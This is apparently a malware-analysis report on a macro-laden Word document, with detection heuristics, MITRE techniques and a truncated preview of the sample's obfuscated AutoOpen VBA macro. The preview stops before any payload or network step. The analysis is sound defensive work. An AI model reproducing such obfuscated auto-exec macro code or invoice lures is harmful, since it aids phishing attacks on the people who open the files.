MALICIOUS
230
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a legacy WordBasic auto-exec macro named 'AutoOpen' which is triggered upon opening the document. This macro utilizes the CreateObject function, a common technique for executing arbitrary code. The ClamAV detection 'Doc.Macro.Obfuscated-6397052-2' further confirms its malicious nature. The presence of an embedded URL and invoice-related language suggests a phishing or social engineering lure.
Heuristics 8
-
ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Fake invoice / payment lure low SE_INVOICE_LUREDocument contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 533993 bytes |
SHA-256: 85d1c4337ef5473dd766ee7e63ccd2ee85119f654dda7b7d73cab47b4648d5c8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "xCLhaz"
Public Function qmJ6CVz40oTI5UZ9(tQodRgoEc7i1TYH As String, Optional MpYj5p3iiZSyIt As Boolean = True) As String
Static ezsGZk0Q65uxLxb(0 To 255) As Byte
Dim BC4Aq1zuSivYth As Object
Dim nZ59hJAJyr1za1 As String
nZ59hJAJyr1za1 = Application.UserName
Dim HiGMJ5F9Ogj, wt3LRg09uKYZ9G As Integer
wt3LRg09uKYZ9G = Len(nZ59hJAJyr1za1)
Dim cCUmrDvS1vX As Collection
While wt3LRg09uKYZ9G > 1
HiGMJ5F9Ogj = HiGMJ5F9Ogj + 2
wt3LRg09uKYZ9G = wt3LRg09uKYZ9G - 5
Wend
Dim jhGnGeiGvneUu2 As Collection
Set jhGnGeiGvneUu2 = New Collection
jhGnGeiGvneUu2.Add "cCUmrDvS1vX"
jhGnGeiGvneUu2.Add "vl2ZCdNZlaz"
jhGnGeiGvneUu2.Add "fwx4JuGltgvPc1"
Dim aeB0C5oRRIg4o4, buXJXfTasTS As Integer
aeB0C5oRRIg4o4 = 9
buXJXfTasTS = 5
#If EDstaVuDXgN <> 0 Then
EDstaVuDXgN = EDstaVuDXgN + 8
Dim CsDXzKPhIJu As Variant
Else
Dim CsDXzKPhIJu As Object
#End If
If aeB0C5oRRIg4o4 > buXJXfTasTS Then
For Q8gQSbSJEvri72 = buXJXfTasTS To aeB0C5oRRIg4o4
buXJXfTasTS = buXJXfTasTS / aeB0C5oRRIg4o4
Next Q8gQSbSJEvri72
End If
Dim JJUtuNKCTvObbV As String
Dim IGf1mYuWSd5 As String
IGf1mYuWSd5 = hxlMbjA3kgZ
JJUtuNKCTvObbV = hILVqucFC53
If (StrComp(JJUtuNKCTvObbV, IGf1mYuWSd5, vbTextCompare) <> 0) Then
MsgBox ("Optional: Rf9e0gzby00yFX.")
End If
Dim sDi5eXlUwJl4I6, B4fc9TRSg1P As Integer
sDi5eXlUwJl4I6 = 1
B4fc9TRSg1P = 5
#If xvk2itXkzyy <> 0 Then
xvk2itXkzyy = xvk2itXkzyy + 3
Dim ATfULkkWIJf As Variant
Else
Dim ATfULkkWIJf As Object
#End If
If sDi5eXlUwJl4I6 > B4fc9TRSg1P Then
For SpgibVEQigrphl = B4fc9TRSg1P To sDi5eXlUwJl4I6
B4fc9TRSg1P = B4fc9TRSg1P / sDi5eXlUwJl4I6
Next SpgibVEQigrphl
End If
Dim GN3M6oHrsKsGbZ As Integer
Dim vW9RBfgQSTn As String
GN3M6oHrsKsGbZ = 9642
Dim ytLIW64xKOc As Integer
vW9RBfgQSTn = Right(CStr(GN3M6oHrsKsGbZ), 1)
ytLIW64xKOc = CInt(vW9RBfgQSTn)
For gWfr6jxV8jG = ytLIW64xKOc To 32
GN3M6oHrsKsGbZ = GN3M6oHrsKsGbZ + 3
Next gWfr6jxV8jG
Dim pvPqgJnEbR7FeFz5() As Byte, fWbtJENAZBErih() As Byte
Dim aPtGC4NrowGSp6 As String
Dim wbDN4htuqIPKLo As Object
Dim pxgzeNk8MdP5Wh As Integer
For Azqsxpr6jwQ = 8 To 82
pxgzeNk8MdP5Wh = Azqsxpr6jwQ
Next Azqsxpr6jwQ
Dim fpFMkPuHUCb9If, JxiyPHITWS6 As String
fpFMkPuHUCb9If = 7
JxiyPHITWS6 = 1
#If fpFMkPuHUCb9If > JxiyPHITWS6 Then
Dim CjjsID9Acwb As LongPtr
#Else
Dim CjjsID9Acwb As Integer
CjjsID9Acwb = 7 + 1
Dim RKKVnaEvX7F As Integer
For RKKVnaEvX7F = 0 To fpFMkPuHUCb9If
RKKVnaEvX7F = RKKVnaEvX7F + 1
Next RKKVnaEvX7F
#End If
Dim QfJSSzPhpKZM8b As String
Dim yqstdXo3esO As String
yqstdXo3esO = e4861j0T5qf
QfJSSzPhpKZM8b = PeIi4mqcB2z
If (StrComp(QfJSSzPhpKZM8b, yqstdXo3esO, vbTextCompare) <> 0) Then
MsgBox ("Optional: w8Z9QYaeZAbDs3.")
End If
Dim AtKfCupc8cL7tq, w5QE5RG9mf7 As Integer
AtKfCupc8cL7tq = 5
w5QE5RG9mf7 = 2
#If azKQyAWLPWD <> 0 Then
azKQyAWLPWD = azKQyAWLPWD + 2
Dim peeHo958FhH As Variant
Else
Dim peeHo958FhH As Object
#End If
If AtKfCupc8cL7tq > w5QE5RG9mf7 Then
For nfuX75kWBHphg7 = w5QE5RG9mf7 To AtKfCupc8cL7tq
w5QE5RG9mf7 = w5QE5RG9mf7 / AtKfCupc8cL7tq
Next nfuX75kWBHphg7
End If
Dim R2HwjymGDnaaYC, igaDal3U5I6 As Integer
R2HwjymGDnaaYC = 5
igaDal3U5I6 = 3
#If yKJzvgPuman <> 0 Then
yKJzvgPuman = yKJzvgPuman + 3
Dim glXH7P7dPHH As Variant
Else
Dim glXH7P7dPHH As Object
#End If
If R2HwjymGDnaaYC > igaDal3U5I6 Then
For v0qsZZLl968xln = igaDal3U5I6 To R2HwjymGDnaaYC
igaDal3U5I6 = igaDal3U5I6 / R2HwjymGDnaaYC
Next v0qsZZLl968xln
End If
Dim jdOBJoln2874Zxb As Long, ZSKJ9IYpGSsqPQeF5g As Long
Dim PHCH0jBaqnvwdd As Integer
Dim eoMhUloDvEHa5b As Integer
Dim jRsOemxnTQWpjj As Integer
Dim YhSc1QAbhj7 As String
jRsOemxnTQWpjj = 5531
Dim cbXM9KiUWP1 As Integer
YhSc1QAbhj7 = Right(CStr(jRsOemxnTQWpjj), 1)
cbXM9KiUWP1 = CInt(YhSc1QAbhj7)
For quR6SNPO1Fc = cbXM9KiUWP1 To 23
jRsOemxnTQWpjj =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.